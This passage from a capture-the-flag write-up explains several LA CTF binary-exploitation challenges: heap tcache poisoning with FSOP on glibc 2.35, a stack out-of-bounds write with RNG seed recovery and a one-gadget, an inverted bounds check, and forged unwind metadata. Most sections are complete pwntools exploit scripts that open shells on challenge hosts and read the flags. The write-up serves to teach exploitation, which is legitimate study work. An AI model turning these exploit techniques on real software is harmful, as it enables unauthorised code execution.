    r1 = write_and_split(environ_addr - 0x18)
    out = get_info(r1)
    m = re.search(br"Student Attributes \(number\): (\d+)", out)
    stack_env = int(m.group(1))
    log.success(f"__environ: {stack_env:#x}")

    # Phase 3: PIE leak
    create_unsorted_0x210()
    pie_loc = stack_env - STACK_OFF
    r2 = write_and_split(pie_loc - 0x18)
    out = get_info(r2)
    m = re.search(br"Student Attributes \(number\): (\d+)", out)
    pie_base = int(m.group(1)) - PIE_OFF
    log.success(f"PIE base: {pie_base:#x}")

    # Phase 4: Stack ROP
    pop_rdi = libc_base + POP_RDI_RET
    ret     = libc_base + RET_GADGET
    binsh   = libc_base + next(libc.search(b"/bin/sh\x00"))
    system  = libc_base + libc.symbols["system"]

    target_sinfo = stack_env - 0x160

    create_unsorted_0x210()
    write_and_split_writer(target_sinfo)

    writer_uid = nuid()
    cidx = (cidx + 1) % 10

    major_blob  = p64(pop_rdi)
    major_blob += p64(binsh)
    major_blob += p64(ret)
    major_blob += p64(system)
    major_blob = major_blob.ljust(0x40, b"\x00")

    io.sendline(b"1")
    io.sendlineafter(b"Enter student UID: ", str(writer_uid).encode())
    io.sendlineafter(b"Enter student information now", b"y")
    io.sendafter(b"Student name: ", pad(b"Z", 0x100))
    io.sendafter(b"Student major: ", major_blob)
    io.sendlineafter(b"Student attributes", b"0")
    io.sendlineafter(b"(y/n)? ", b"n")

    io.recvuntil(b"added at index")
    io.recvline()
    import time; time.sleep(0.3)
    io.sendline(b"cat flag* 2>/dev/null; id")
    io.interactive()

if __name__ == "__main__":
    main()
```

**Flag:** `lactf{w0w_y0u_s0lv3d_m3_heap_heap_hurray}`

### tcademy

#### Description

Menu-based note app with 2 slots: `create` allocates `malloc(size)` (size 0 to 0xf8) and then reads user data, `read` prints the note with `puts`, and `delete` frees it.

The bug is in the read length: for `size == 8` it reads 1 byte; otherwise it reads `size - 8` bytes. For `size < 8` the subtraction underflows an unsigned short and becomes a huge read, giving a forward heap overflow from the allocated chunk.
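
A quick model of the length computation (assuming, as described, that the length lives in an unsigned short):

```python
def read_len(size: int) -> int:
    """Model of the note-read length: size - 8 held in an unsigned short."""
    if size == 8:
        return 1
    return (size - 8) & 0xFFFF  # unsigned-short wraparound

assert read_len(0x10) == 8     # normal case
assert read_len(8) == 1        # special case: only 1 byte read
assert read_len(0) == 0xFFF8   # size < 8 underflows to a ~64 KiB read
print(hex(read_len(0)))
```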

Goal: get code execution on glibc 2.35 with PIE, RELRO, NX, canary, and safe-linking.

#### Solution

1. **Libc leak (unsorted bin fd) using 1-byte clobber + `puts`**
   * Allocate a small chunk and a 0x110 chunk.
   * Free the small chunk, then reallocate it with `size=0` and overflow into the 0x110 chunk header to fake its size as `0x421` (unsorted bin sized) and place fake next chunk headers to satisfy `free` checks.
   * Free that “large” chunk into the unsorted bin.
   * Allocate a `size=8` chunk from it: the program only reads 1 byte, so it overwrites only the low byte of the stale unsorted `fd` pointer. `puts()` then leaks the remaining bytes.
   * Reconstruct the leaked libc page and compute `libc_base` using the fixed relation (Ubuntu glibc 2.35-0ubuntu3.8): `fd_page - libc_base == 0x21b000`.
2. **Heap leak (safe-linking) from two adjacent 0x20 chunks**
   * Free two adjacent 0x20 chunks into tcache.
   * Reallocate both with `size=8` so only 1 byte is written, preserving most of the safe-linked `fd` values in the chunk user data.
   * Leak both values via `puts()`, brute-force the clobbered low bytes, and solve the safe-linking equations.
   * The low-byte brute force can yield multiple candidate solutions; in this challenge the first user allocation consistently lands at offset `0x2a0` in its heap page (right after the `tcache_perthread_struct` chunk), so we select the candidate with that page offset.
3. **Tcache poisoning into `_IO_2_1_stderr_`**
   * From the earlier unsorted remainder, allocate two 0x110 chunks `V` and `W`, free them so `V` is at the head of `tcache[0x110]`.
   * Allocate the adjacent 0x20 chunk with `size=0` and overflow into freed `V`’s tcache `next` pointer, overwriting it with a safe-linked pointer to `_IO_2_1_stderr_` in libc.
   * Next `malloc(0xf8)` returns `V` (we use it for attacker-controlled `_IO_wide_data`), and the following `malloc(0xf8)` returns a chunk overlapping `stderr`, letting us overwrite the `FILE` object.
4. **FSOP on exit (wide stream path)**
   * Overwrite `stderr` with a fake `FILE`:
     * Place the command string at the start so `system(fp)` uses it.
     * Set `_mode=1` and `vtable=_IO_wfile_jumps` to take the wide-stream flush path.
     * Point `_wide_data` to our heap `wide_data` chunk.
     * Set `_lock` to a safe writable address that does not clobber `wide_data->write_ptr/write_base`.
   * Craft `_IO_wide_data` so flush sees pending output (`write_ptr > write_base`) and forces buffer allocation (`buf_base == NULL`), reaching `_IO_wdoallocbuf` and then a function pointer in the wide vtable.
   * Place a fake wide vtable pointer inside `wide_data` such that the vtable slot at `+0x68` is `system`.
   * Trigger `exit`, which flushes `_IO_list_all`, invoking the chain and executing `system("echo;cat /app/flag.txt")`.
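
The safe-linking algebra behind step 2 can be checked standalone. A sketch with a made-up chunk address, mirroring the free order above (B, then C = B+0x20) and the solver's page-carry handling:

```python
def protect_ptr(pos: int, ptr: int) -> int:
    # glibc >= 2.32 PROTECT_PTR: value stored in a tcache fd at `pos`
    return (pos >> 12) ^ ptr

# Hypothetical layout: two adjacent 0x20 chunks, freed B first, then C.
B = 0x55F0123452A0
C = B + 0x20
m2 = protect_ptr(B, 0)   # B's fd links to NULL -> stored value is B >> 12
m1 = protect_ptr(C, B)   # C's fd links to B    -> (C >> 12) ^ B

# Recover B the way the solver does: C's page is B's page or the next one.
found = None
for c12 in (m2, m2 + 1):
    b = m1 ^ c12
    if (b >> 12) == m2 and ((b + 0x20) >> 12) == c12:
        found = b
assert found == B
print(hex(found))
```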

Exploit code (used for remote solve and local validation):

```python
#!/usr/bin/env python3
from __future__ import annotations

import argparse
import re
import struct

from pwn import PIPE, STDOUT, context, process, remote


def p64(x: int) -> bytes:
    return struct.pack("<Q", x & 0xFFFFFFFFFFFFFFFF)


def u64(b: bytes) -> int:
    return struct.unpack("<Q", b.ljust(8, b"\x00"))[0]


def protect_ptr(pos: int, ptr: int) -> int:
    # glibc safe-linking (PROTECT_PTR): fd = (pos >> 12) ^ ptr
    return ((pos >> 12) ^ ptr) & 0xFFFFFFFFFFFFFFFF


MENU_HDR = b"_____________________________\n"


def choice(io, n: int) -> None:
    io.sendlineafter(b"Choice > ", str(n).encode())


def create(io, idx: int, size: int, data: bytes) -> None:
    choice(io, 1)
    io.sendlineafter(b"Index: ", str(idx).encode())
    io.sendlineafter(b"Size: ", str(size).encode())
    io.sendafter(b"Data: ", data)
    io.recvuntil(b"Note created!\n")


def delete(io, idx: int) -> None:
    choice(io, 2)
    io.sendlineafter(b"Index: ", str(idx).encode())
    io.recvuntil(b"Note deleted!\n")


def read_note_raw(io, idx: int) -> bytes:
    choice(io, 3)
    io.sendlineafter(b"Index: ", str(idx).encode())
    out = io.recvuntil(MENU_HDR)
    return out[: -len(MENU_HDR)]


def solve_heap_from_leaks(leak0: bytes, leak1: bytes) -> int:
    leak0 = leak0.rstrip(b"\n")
    leak1 = leak1.rstrip(b"\n")

    known_m1 = {i: leak0[i] for i in range(1, len(leak0))}
    known_m2 = {i: leak1[i] for i in range(1, len(leak1))}

    nul_m1 = len(leak0)
    nul_m2 = len(leak1)

    candidates: list[int] = []

    for b0_m1 in range(256):
        m1_bytes = bytearray(8)
        m1_bytes[0] = b0_m1
        for i, v in known_m1.items():
            if i < 8:
                m1_bytes[i] = v
        if 0 <= nul_m1 < 8:
            m1_bytes[nul_m1] = 0
            for j in range(nul_m1 + 1, 8):
                m1_bytes[j] = 0
        m1 = int.from_bytes(m1_bytes, "little")

        for b0_m2 in range(256):
            m2_bytes = bytearray(8)
            m2_bytes[0] = b0_m2
            for i, v in known_m2.items():
                if i < 8:
                    m2_bytes[i] = v
            if 0 <= nul_m2 < 8:
                m2_bytes[nul_m2] = 0
                for j in range(nul_m2 + 1, 8):
                    m2_bytes[j] = 0
            m2 = int.from_bytes(m2_bytes, "little")

            # Leak layout:
            #   free(B), free(C=B+0x20), then allocate C (leak0) then B (leak1)
            #
            # So:
            #   m2 = PROTECT_PTR(B, NULL) = B>>12
            #   m1 = PROTECT_PTR(C, B)    = (C>>12) ^ B, with C=B+0x20
            #
            # Page-boundary edge case: (B+0x20)>>12 can equal B>>12 or B>>12+1.
            for c12 in (m2, (m2 + 1) & 0xFFFFFFFFFFFFFFFF):
                b = m1 ^ c12
                if (b >> 12) != m2:
                    continue
                if ((b + 0x20) >> 12) != c12:
                    continue
                if b & 0xF:
                    continue
                if (b >> 40) == 0:
                    continue
                candidates.append(b)

    if not candidates:
        raise RuntimeError("heap solve failed")

    # Prefer the candidate matching the first-user-chunk offset in this binary/glibc.
    preferred = [b for b in candidates if (b & 0xFFF) == 0x2A0]
    if len(preferred) == 1:
        return preferred[0]

    return candidates[0]


def leak_libc(io) -> int:
    create(io, 0, 8, b"X")
    create(io, 1, 0xF8, b"Y" * 8)
    delete(io, 0)

    payload = bytearray(b"A" * 0x500)
    payload[0x10 : 0x10 + 16] = p64(0) + p64(0x421)
    payload[0x430 : 0x430 + 16] = p64(0) + p64(0x21)
    payload[0x450 : 0x450 + 16] = p64(0) + p64(0x21)

    create(io, 0, 0, bytes(payload))
    delete(io, 1)

    create(io, 1, 8, b"Z")
    leak_line = read_note_raw(io, 1).split(b"\n", 1)[0]
    if not leak_line.startswith(b"Z"):
        raise RuntimeError(f"unexpected libc leak line: {leak_line!r}")

    rest = leak_line[1:]
    if len(rest) < 3:
        raise RuntimeError(f"libc leak too short: {leak_line!r}")
    b = bytearray(8)
    b[0] = 0
    for i in range(min(len(rest), 7)):
        b[1 + i] = rest[i]
    if b[5] == 0:
        b[5] = 0x7F
    fd_page = u64(bytes(b)) & ~0xFFF
    return (fd_page - 0x21B000) & 0xFFFFFFFFFFFFFFFF


def main() -> int:
    ap = argparse.ArgumentParser()
    ap.add_argument("--remote", action="store_true")
    ap.add_argument("--host", default="chall.lac.tf")
    ap.add_argument("--port", type=int, default=31144)
    args = ap.parse_args()

    context.log_level = "error"

    if args.remote:
        io = remote(args.host, args.port)
        cmd = b"echo;cat /app/flag.txt"
    else:
        io = process(
            [
                "./glibc235/ld-linux-x86-64.so.2",
                "--library-path",
                "./glibc235",
                "./attachments/chall",
            ],
            stdin=PIPE,
            stdout=PIPE,
            stderr=STDOUT,
        )
        cmd = b"echo;cat local_flag.txt"

    try:
        libc_base = leak_libc(io)

        # glibc 2.35-0ubuntu3.8 offsets
        SYSTEM_OFF = 0x50D70
        IO_WFILE_JUMPS_OFF = 0x2170C0
        STDERR_OFF = 0x21B6A0

        system_addr = libc_base + SYSTEM_OFF
        wfile_jumps_addr = libc_base + IO_WFILE_JUMPS_OFF
        stderr_addr = libc_base + STDERR_OFF

        # Heap leak from the two adjacent 0x20 chunks.
        delete(io, 0)
        delete(io, 1)
        create(io, 0, 8, b"A")
        leak0 = read_note_raw(io, 0).split(b"\n", 1)[0]
        create(io, 1, 8, b"B")
        leak1 = read_note_raw(io, 1).split(b"\n", 1)[0]

        b_user = solve_heap_from_leaks(leak0, leak1)
        v_user = (b_user + 0x40) & 0xFFFFFFFFFFFFFFFF  # start of the unsorted remainder

        # Phase: poison a 0x110 tcache entry to land an allocation on _IO_2_1_stderr_.
        delete(io, 1)
        delete(io, 0)

        create(io, 0, 0xF8, b"V" * 8)
        create(io, 1, 0xF8, b"W" * 8)

        delete(io, 1)
        delete(io, 0)

        mangled = protect_ptr(v_user, stderr_addr)
        overflow = b"A" * 0x20 + p64(mangled)
        create(io, 0, 0, overflow)
        delete(io, 0)

        # wide_data lives in V.
        wide_data_addr = v_user
        wide_data = bytearray(b"\x00" * 0xF0)
        struct.pack_into("<Q", wide_data, 0x18, 0)  # write_base
        struct.pack_into("<Q", wide_data, 0x20, 1)  # write_ptr
        struct.pack_into("<Q", wide_data, 0x30, 0)  # buf_base (must be NULL)
        struct.pack_into("<Q", wide_data, 0xE0, wide_data_addr + 0x80)  # _wide_vtable
        struct.pack_into("<Q", wide_data, 0xE8, system_addr)  # wide_vtable+0x68 -> system
        create(io, 0, 0xF8, bytes(wide_data))

        # Allocate poisoned -> stderr and write fake FILE there.
        if not cmd or (cmd[0] & 0x2):
            raise ValueError("cmd[0] must have bit1 cleared")
        if len(cmd) >= 0x20:
            raise ValueError("cmd too long (must be <0x20)")

        fake = bytearray(b"\x00" * 0xE0)  # avoid corrupting stdout
        fake[: len(cmd)] = cmd
        fake[len(cmd)] = 0

        buf = wide_data_addr + 0x60
        struct.pack_into("<Q", fake, 0x20, buf)
        struct.pack_into("<Q", fake, 0x28, buf + 1)
        struct.pack_into("<Q", fake, 0x30, buf + 8)
        struct.pack_into("<Q", fake, 0x38, buf)
        struct.pack_into("<Q", fake, 0x40, buf + 8)

        lock_addr = wide_data_addr + 0x40
        struct.pack_into("<Q", fake, 0x88, lock_addr)
        struct.pack_into("<Q", fake, 0xA0, wide_data_addr)
        struct.pack_into("<I", fake, 0xC0, 1)  # _mode > 0
        struct.pack_into("<Q", fake, 0x68, 0)  # _wide_data->buf_base triggers wdoallocbuf
        struct.pack_into("<Q", fake, 0xD8, wfile_jumps_addr)

        create(io, 1, 0xF8, bytes(fake))

        # Trigger exit (flush-all over _IO_list_all).
        choice(io, 4)

        data = io.recvrepeat(5.0)
        m = re.search(rb"lactf\{[^}]+\}", data)
        if not m:
            raise RuntimeError(f"flag not found; tail={data[-400:]!r}")
        print(m.group(0).decode())
        return 0
    finally:
        io.close()


if __name__ == "__main__":
    raise SystemExit(main())
```

### this-is-how-you-pwn-the-time-war

#### Description

The binary prints a 4-digit lock code generated by `rand()%16`, then lets you “turn” two dials by choosing indices and values. The indices are `short` and there is no bounds checking, so the program performs two out-of-bounds 16-bit writes on its stack frame.

Remote: `nc chall.lac.tf 31313`

#### Solution

**Bug:** `run()` has `short code[4]` at `rbp-0xc` and writes `code[ind]=val` twice. That’s an arbitrary 2-byte write at `rbp-0xc + 2*ind`.

**Useful stack targets (halfword indices from `&code[0]`):**

* `10`: low16 of `run()` return address
* `18`/`19`: low32 of `main()` return address (into libc)
* `0x9a`: `*(u16*)rbx` at gadget time (needed for the one-gadget constraint)
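
These indices follow from `code` sitting at `rbp-0xc`: a 16-bit word at `rbp + off` is `code[(off + 0xc) / 2]`. A sanity check (the `rbp+0x18`/`rbp+0x1a` locations for `main()`'s return low32 are as observed in this binary):

```python
CODE_OFF = -0xC  # &code[0] relative to rbp inside run()

def halfword_index(rbp_rel: int) -> int:
    """Index i such that code[i] aliases the 16-bit word at rbp + rbp_rel."""
    off = rbp_rel - CODE_OFF
    assert off % 2 == 0
    return off // 2

assert halfword_index(0x08) == 10   # run()'s saved return address, low 16 bits
assert halfword_index(0x18) == 18   # main()'s return address, bits 0..15
assert halfword_index(0x1A) == 19   # main()'s return address, bits 16..31
print("indices check out")
```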

**Libc low32 from RNG:** `init()` does `srand(clock_gettime)` where `clock_gettime` comes from the GOT. `srand()` truncates to 32 bits, so the seed is `clock_gettime_addr & 0xffffffff`. The printed dial values are `rand()%16`, so two consecutive dial lines (8 outputs) uniquely identify the 32-bit seed for glibc 2.36 `rand()`. From that: `libc_base_lo32 = (seed - clock_gettime_offset) & 0xffffffff`.

This solve script uses `attachments/seed_finder` + `attachments/rand_helper` (built against the challenge glibc) to deduce the seed.
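
The C helpers exist because scanning all 2^32 seeds is too slow in Python, but the generator itself is easy to model. A pure-Python sketch of glibc's default (TYPE_3) `rand()` using the well-known additive-feedback reformulation (valid for seeds in `1..2^31-1`; full 32-bit seeds hit signed-arithmetic corner cases that the C helpers handle):

```python
def glibc_rand(seed: int, n: int) -> list[int]:
    """First n outputs of glibc rand() for the default TYPE_3 state.

    Additive-feedback reformulation: 31 LCG-seeded words, 3 duplicated,
    then r[i] = r[i-31] + r[i-3] (mod 2**32); 310 outputs are discarded.
    Assumes 0 < seed < 2**31.
    """
    r = [seed]
    for i in range(1, 31):
        r.append((16807 * r[-1]) % 2147483647)
    for i in range(31, 34):
        r.append(r[i - 31])
    for i in range(34, 344 + n):
        r.append((r[i - 31] + r[i - 3]) % 2**32)
    return [x >> 1 for x in r[344:]]

# Canonical glibc values for srand(1):
assert glibc_rand(1, 3) == [1804289383, 846930886, 1681692777]
# The dials print rand() % 16, so 8 consecutive outputs pin down the seed:
print([x % 16 for x in glibc_rand(1, 8)])
```

A full seed search then just compares these mod-16 streams against the two observed dial lines, which is exactly what the C helpers do at native speed.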

**Getting enough writes:** `main()` calls `run()` once. To get multiple `run()` invocations, overwrite `run()`’s return low16 (index `10`) to return to `main+0x132a` (just before the `call run`). PIE makes the low16 depend on a 4-bit nibble of the PIE base; brute-force that nibble (16 possibilities).

Important: every time `main` executes `call run`, it *re-pushes* the return address, so the loop overwrite must be applied again each `run()` iteration.

**Hijack into libc:** after seed recovery, compute the one-gadget low32 `one_lo32 = (libc_base_lo32 + 0x4c139) & 0xffffffff` and overwrite `main`’s return low32 (indices `18`/`19`). Upper 32 bits stay correct from the original libc return address.
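
Because each dial write is 16 bits wide, the low32 overwrite is just two writes. The split looks like this (with a made-up libc low32 for illustration):

```python
ONE_GADGET_OFF = 0x4C139

def dial_values(libc_base_lo32: int) -> tuple[int, int]:
    """Split the one-gadget low32 into the two 16-bit dial writes
    for indices 18 (bits 0..15) and 19 (bits 16..31)."""
    one_lo32 = (libc_base_lo32 + ONE_GADGET_OFF) & 0xFFFFFFFF
    return one_lo32 & 0xFFFF, (one_lo32 >> 16) & 0xFFFF

lo16, hi16 = dial_values(0xF7D00000)  # hypothetical libc base low32
assert (hi16 << 16) | lo16 == (0xF7D00000 + ONE_GADGET_OFF) & 0xFFFFFFFF
print(hex(lo16), hex(hi16))
```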

**One-gadget constraint:** ensure `rbx == NULL || *(u16*)rbx == 0` by writing `0` at index `0x9a`.

**Write schedule (4 runs total once the correct PIE nibble is used):**

1. Run 1: set `run()` return to loop.
2. Run 2: set `run()` return to loop, and zero `*(u16*)rbx`.
3. Run 3: set `run()` return to loop, and write `main` return low16.
4. Run 4: restore `run()` return to normal (`main+0x1334`) and write `main` return hi16, so `main` returns into the one-gadget and spawns a shell.

In the jail, the flag is at `/app/flag.txt` (pwn.red/jail typically chroots `/srv` to `/`).

**Exploit Code (`solve.py`)**

```python
#!/usr/bin/env python3
from pwn import *
import os
import re
import subprocess
import sys

context.binary = ELF('attachments/pwn_the_time_war')
context.arch = 'amd64'
context.log_level = os.environ.get('LOG', 'info')

LD = './attachments/ld-linux-x86-64.so.2'
LIBDIR = './attachments'
BIN = './attachments/pwn_the_time_war'

SEED_FINDER = './attachments/seed_finder'
RAND_HELPER = './attachments/rand_helper'

CLOCK_GETTIME_OFF = 0xcf420
ONE_GADGET_OFF = 0x4c139  # posix_spawn(rsp+0xc, "/bin/sh", 0, rbx, rsp+0x50, environ)

# Halfword indices relative to &code[0] (rbp-0xc) inside run().
IDX_RUN_RET_LO16 = 10
IDX_MAIN_RET_LO16 = 18
IDX_MAIN_RET_HI16 = 19

# Target that hits *(u16*)rbx (posix_spawnattr_t->__flags) at gadget time.
# This depends on argv/env layout; the default is what was observed in the
# Debian 12 jail-like environment.
IDX_RBX_TARGET = 0x9A

_dial_re = re.compile(rb"reads: (\d+)-(\d+)-(\d+)-(\d+)")


def s16(x: int) -> int:
    x &= 0xFFFF
    return x - 0x10000 if x & 0x8000 else x


def recv_dial(io: tube) -> list[int]:
    while True:
        line = io.recvline()
        m = _dial_re.search(line)
        if m:
            return [int(x) for x in m.groups()]


def do_turn(io: tube, ind1: int, val1: int, ind2: int, val2: int):
    io.recvuntil(b"Which dial do you want to turn? ")
    io.sendline(str(ind1).encode())
    io.recvuntil(b"What do you want to set it to? ")
    io.sendline(str(val1).encode())
    io.recvuntil(b"Second dial to turn? ")
    io.sendline(str(ind2).encode())
    io.recvuntil(b"What do you want to set it to? ")
    io.sendline(str(val2).encode())


def seed_candidates(dial: list[int]) -> list[int]:
    out = subprocess.check_output([SEED_FINDER, *map(str, dial)], text=True)
    seeds = []
    for line in out.splitlines():
        line = line.strip()
        if not line.startswith('SEED '):
            continue
        parts = line.split()
        seeds.append(int(parts[-1], 16))
    if not seeds:
        raise RuntimeError('no seeds found')
    return seeds


def predict(seed: int, n: int) -> list[int]:
    out = subprocess.check_output([RAND_HELPER, hex(seed), str(n)], text=True)
    return [int(x) for x in out.splitlines() if x.strip()]


def deduce_seed(d1: list[int], d2: list[int]) -> int:
    seeds = seed_candidates(d1)
    for s in seeds:
        seq = predict(s, 8)
        if seq[4:8] == d2:
            return s
    raise RuntimeError('failed to deduce unique seed')


def attempt(io: tube, pie_nybble: int) -> tube | None:
    """Try a single PIE low-nybble guess; return io if we reach a shell."""

    base_lo16 = (pie_nybble & 0xF) << 12
    run_ret_loop_lo16 = (base_lo16 + 0x132A) & 0xFFFF  # main+0x132a
    run_ret_norm_lo16 = (base_lo16 + 0x1334) & 0xFFFF  # main+0x1334

    d1 = recv_dial(io)

    # Iter 1: loop run() once to get a second dial code.
    do_turn(io, IDX_RUN_RET_LO16, s16(run_ret_loop_lo16), 0, 0)

    try:
        d2 = recv_dial(io)
    except Exception:
        # Wrong PIE nibble guess: run() returned somewhere bogus and the
        # process died before printing a second dial line.
        return None

    seed = deduce_seed(d1, d2)
    libc_base_lo32 = (seed - CLOCK_GETTIME_OFF) & 0xFFFFFFFF
    one_lo32 = (libc_base_lo32 + ONE_GADGET_OFF) & 0xFFFFFFFF
    one_lo16 = one_lo32 & 0xFFFF
    one_hi16 = (one_lo32 >> 16) & 0xFFFF

    log.info(
        f"pie_nybble={pie_nybble} d1={d1} d2={d2} seed={hex(seed)} "
        f"libc_base_lo32={hex(libc_base_lo32)} one_lo32={hex(one_lo32)}"
    )

    # Iter 2: we are at the 2nd run() prompt. Keep looping and satisfy the
    # one_gadget constraint `rbx == NULL || *(u16 *)rbx == 0`.
    do_turn(io, IDX_RUN_RET_LO16, s16(run_ret_loop_lo16), IDX_RBX_TARGET, 0)

    # Iter 3: keep looping and write low16 of main's return address.
    recv_dial(io)
    do_turn(io, IDX_RUN_RET_LO16, s16(run_ret_loop_lo16), IDX_MAIN_RET_LO16, s16(one_lo16))

    # Iter 4: write hi16 of main's return address and stop looping so main
    # returns into the one_gadget.
    recv_dial(io)
    do_turn(io, IDX_RUN_RET_LO16, s16(run_ret_norm_lo16), IDX_MAIN_RET_HI16, s16(one_hi16))

    # If we landed in a shell, prove it. recvuntil() returns b'' on timeout
    # rather than raising, so check the result explicitly.
    io.sendline(b'echo READY')
    if b'READY' not in io.recvuntil(b'READY', timeout=1):
        return None
    return io


def try_get_flag(io: tube) -> str | None:
    # pwn.red/jail typically chroots to /srv, so the flag ends up at /app/flag.txt.
    io.sendline(
        b'cat flag.txt 2>/dev/null || cat /app/flag.txt 2>/dev/null || cat /srv/app/flag.txt 2>/dev/null; echo __END__'
    )
    out = io.recvuntil(b'__END__', timeout=5)
    m = re.search(rb"lactf\{[^}]+\}", out)
    if not m:
        log.failure(f"flag not found in output: {out!r}")
        return None
    return m.group(0).decode()


def get_io():
    if args.REMOTE:
        return remote('chall.lac.tf', 31313)
    # Use a minimal environment to better match the remote jail and stabilize
    # stack layout for the RBX-target write.
    return process([LD, '--library-path', LIBDIR, BIN], env={})


if __name__ == '__main__':
    io = None
    for attempt_no in range(256):
        pie_nybble = attempt_no % 16
        t = get_io()
        try:
            io = attempt(t, pie_nybble)
            if io is not None:
                break
        except Exception:
            io = None
        if io is None:
            try:
                t.close()
            except Exception:
                pass

    if io is None:
        raise SystemExit('failed to get a shell (PIE nybble brute exhausted)')

    if args.REMOTE:
        flag = try_get_flag(io)
        if not flag:
            raise SystemExit('got a shell but could not read flag')
        print(flag)
        sys.exit(0)

    # Local sanity check: prove we have a working shell.
    io.sendline(b'id; echo __END__')
    out = io.recvuntil(b'__END__', timeout=2)
    sys.stdout.buffer.write(out)
    sys.exit(0)
```

### tic-tac-no

#### Description

Tic-tac-toe is a draw when played perfectly. Can you be more perfect than my perfect bot?

`nc chall.lac.tf 30001`

#### Solution

The binary is a tic-tac-toe game against a minimax bot. The program prints the flag only if `winner == player` (player is `'X'`).

The vulnerability is in `playerMove()`. The bounds check logic is inverted:

```c
if(index >= 0 && index < 9 && board[index] != ' '){
   printf("Invalid move.\n");
}else{
   board[index] = player;
   break;
}
```

The `else` branch runs whenever the condition as a whole is false, which includes `index` being out of bounds (`index < 0` or `index >= 9`): the bounds checks short-circuit the `&&` chain, so the unchecked write `board[index] = player` executes. This gives an out-of-bounds write of `'X'` at an attacker-chosen offset relative to the global `board`.

From `nm` (these are PIE-relative symbol offsets; the relative layout is stable even with ASLR):

* `player` @ `0x4050`
* `computer` @ `0x4051`
* `board` @ `0x4068`

So `board[-23]` targets `computer` because `0x4068 - 0x4051 = 0x17 = 23`. Choose inputs so: `index = (x-1)*3 + (y-1) = -23`, e.g. `x = -7`, `y = 2`.

This overwrites `computer` from `'O'` to `'X'`, making `computer == player == 'X'`. Now when the bot makes a 3-in-a-row of `'X'`, `checkWin()` returns `'X'` and the program treats it as a *player* win and prints the flag.
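
Finding the row/column inputs for a given offset is mechanical. A small sketch (the `inputs_for_offset` helper is ours, not part of the challenge) that inverts `index = (x-1)*3 + (y-1)` while keeping the column in the accepted `1..3` range:

```python
def inputs_for_offset(off: int, lo: int = -100, hi: int = 100):
    """Find (row, col) with col in 1..3 such that (row-1)*3 + (col-1) == off."""
    for row in range(lo, hi + 1):
        col = off - (row - 1) * 3 + 1
        if 1 <= col <= 3:
            return row, col
    return None
```

`inputs_for_offset(-23)` yields `(-7, 2)`, the values the exploit sends; `0x4068 - 0x4051 = 0x17 = 23` bytes back from `board` is exactly `computer`.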

```python
from pwn import *

r = remote('chall.lac.tf', 30001)

# OOB write: index = (-7-1)*3 + (2-1) = -23
# board[-23] overwrites the 'computer' variable with 'X'
r.sendlineafter(b'row #(1-3): ', b'-7')
r.sendlineafter(b'column #(1-3): ', b'2')

# Play corner to help form a diagonal
r.sendlineafter(b'row #(1-3): ', b'1')
r.sendlineafter(b'column #(1-3): ', b'1')

# Computer completes the 0-4-8 diagonal with 'X' -> player "wins"
r.recvuntil(b'\n')
print(r.recvall(timeout=5).decode())
```

Flag: `lactf{th3_0nly_w1nn1ng_m0ve_1s_t0_p1ay}`

### refraction

#### Description

The binary reads `0x100` bytes from stdin into `__GNU_EH_FRAME_HDR` (the `.eh_frame_hdr` / `.eh_frame` area), then immediately throws a C++ exception (`throw "eh?";`).\
This means our only input is a controlled overwrite of the unwind metadata that libgcc/libstdc++ consults during exception unwinding.

Goal: forge unwind info so the unwinder “finds” a handler that ends up executing `system("cat flag.txt")`.

#### Solution

We overwrite `.eh_frame_hdr` and the beginning of `.eh_frame` with a minimal, valid set of unwind records:

* A forged `.eh_frame_hdr` table with 2 entries:
  * one FDE covering `f()` (where the exception originates)
  * one FDE covering a fake “handler function” range `0x1200..0x1400` (covers both main’s return IP `0x125a` and the chosen landing pad `0x1213`)
* A CIE using augmentation `"zPLR"` so we can provide:
  * a personality (`__gxx_personality_v0`)
  * an LSDA pointer encoding
  * an FDE pointer encoding
* Two FDEs:
  1. **FDE for `f()`**: we make unwinding *pretend* the caller frame is inside our fake handler range, and we prepare registers for the landing pad.
     * `DW_CFA_def_cfa_expression`: sets the *CFA* to point at our command string in the overwrite buffer.
     * `DW_CFA_val_expression` for **RIP**: spoofs the caller RIP into `handler_start+1` so the next frame lookup uses our handler FDE.
     * `DW_CFA_val_expression` for **RSP**: restores the *real* stack pointer (`rbp+16`) so `system()` has plenty of stack space. (If RSP stayed in our tiny `.eh_frame` page, `system()` crashes due to stack underflow.)
  2. **FDE for the handler range**: provides an LSDA that catches `const char*` and sets the landing pad to `0x1213` (`call system@plt` inside `g()`’s catch block).

At the landing pad, empirically `RDI` ends up equal to the CFA-derived value on this target, so `system()` receives a pointer to our command string while still running on the real stack (thanks to the explicit RSP rule).
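
The pointer-encoding bytes used throughout the forgery (`0x1B`, `0x3B`, `0x9B`) are DWARF `DW_EH_PE_*` values: the low nibble selects the value format, bits 4–6 select the base the value is applied against, and bit 7 adds an indirection. A small decoder sketch makes the constants in the solver self-describing:

```python
# DW_EH_PE_* pointer encodings: low nibble = value format,
# bits 4-6 = application/base, bit 7 = indirect.
FORMATS = {
    0x0: "absptr", 0x1: "uleb128", 0x2: "udata2", 0x3: "udata4", 0x4: "udata8",
    0x9: "sleb128", 0xA: "sdata2", 0xB: "sdata4", 0xC: "sdata8",
}
BASES = {0x00: "abs", 0x10: "pcrel", 0x20: "textrel", 0x30: "datarel",
         0x40: "funcrel", 0x50: "aligned"}

def describe_dw_eh_pe(enc: int) -> str:
    """Human-readable name for a DW_EH_PE encoding byte."""
    if enc == 0xFF:
        return "omit"
    parts = [BASES[enc & 0x70], FORMATS[enc & 0x0F]]
    if enc & 0x80:
        parts.append("indirect")
    return "|".join(parts)
```

So `0x1B` is `pcrel|sdata4` (FDE and LSDA pointers), `0x3B` is `datarel|sdata4` (the header table), and `0x9B` is `pcrel|sdata4|indirect` (the personality pointer, read through `DW.ref.__gxx_personality_v0`).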

Run:

* Local: `python3 solve2.py --local`
* Remote: `python3 solve2.py`

Solution code (`solve2.py`):

```python
#!/usr/bin/env python3
from __future__ import annotations

import argparse
import struct
from dataclasses import dataclass

from pwn import context, process, remote


def p8(x: int) -> bytes:
    return struct.pack("<B", x & 0xFF)


def p32(x: int) -> bytes:
    return struct.pack("<I", x & 0xFFFFFFFF)


def p32s(x: int) -> bytes:
    return struct.pack("<i", int(x))


def uleb128(x: int) -> bytes:
    assert x >= 0
    out = bytearray()
    while True:
        b = x & 0x7F
        x >>= 7
        if x:
            out.append(b | 0x80)
        else:
            out.append(b)
            break
    return bytes(out)


def sleb128(x: int) -> bytes:
    out = bytearray()
    more = True
    while more:
        b = x & 0x7F
        x_shifted = x >> 7
        sign_bit = b & 0x40
